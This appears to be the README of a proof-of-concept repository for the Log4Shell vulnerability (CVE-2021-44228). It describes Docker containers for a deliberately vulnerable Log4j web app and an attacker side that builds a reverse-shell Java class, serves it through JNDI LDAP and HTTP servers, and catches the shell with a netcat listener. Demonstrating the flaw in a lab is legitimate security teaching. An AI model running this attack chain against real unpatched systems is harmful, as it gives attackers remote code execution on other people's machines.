This repository is a Proof-Of-Concept for CVE-2021-44228 vulnerability.
It is derived from This Repo.
In this repository I have made an example of a vulnerable application and a demonstration of how to exploit it.
I have modified the upstream python script to automate generation of this vulnarability.
In this repo there are two Dockerfiles for easy use as follows:
In this Docker image we download java jdk-8u20 from my google drive as you are required to make an account on oracle in order to download this.
If you do not trust this, you can modify the downloading file from the Dockerfile and download the jdk from here (Make sure you downlaod Java SE Development Kit 8u20 version for linux).
This Docker Image runs a modified version of the script provided by kozmer and it does the following:
- Generates and compiles a java class that spawns a reverse shell (named Exploit) - jdk is required for this.
- Creates an JNDI LDAP server that can perform lookups and resolves request to map to our server where the payload will reside.
- Opens a SimpleHttpServer that can provide files via requests generated by JNDI lookup.
Default ports used for this are 1389 for JNDI LDAP, 8000 for the SimpleHttpServer and 9001 for the reverse shell!
In order to compile and run this run:
sudo docker build -t log4j-ldap .
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldapUse docker logs <containerID> in order to see logs from app and retreive the correct input that need to be provided to the vulnerable app
For this PoC I have considered the default IPs used by docker (172.17.0.1/24), you can change them in ./Docker-Ldap/run.sh script to match your scenario.
In this docker image run a vulnerable web application that uses the unpatched version of Log4J 2 and exposes it on port 8080.
The app source is also available in ./Docker-Vuln, credits to kozmer.
In order to compile and run this run:
sudo docker build -t log4j-ldap .
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldapUsername is the injectable field!
In order to accept the reverse shell you must create a netcat listener for port 9001
nc -lvnp 9001After downloading the repo, make sure you have docker engine installed and do not have other dokcer images running on your machine.
- After that run the
config.shscript to build images and start them. (This script uses root privileges to run, you can modify them accordingly). - Open a netcat listener on port
9001. - Fire up your browser and navigate to
localhost:8080 - Extract payload from log4j-ldap docker container logs (
docker logs <containerID>). - Enter the payload in user field and a random password.
- Enjoy!
- A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land
- Apache Log4j Security Vulnerabilities
- CVE-2021-44228
- CVE-2021-44228 Detail
- Log4j Lookups in Depth
- Log4j Vulnerability
- CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE
- Log4Shell: RCE 0-day exploit found in log4j 2
- How to Automatically Mitigate Log4Shell via a Live Patch
- Understanding Log4Shell via Exploitation and Live Patching
- How To Detect and Mitigate the Log4Shell Vulnerability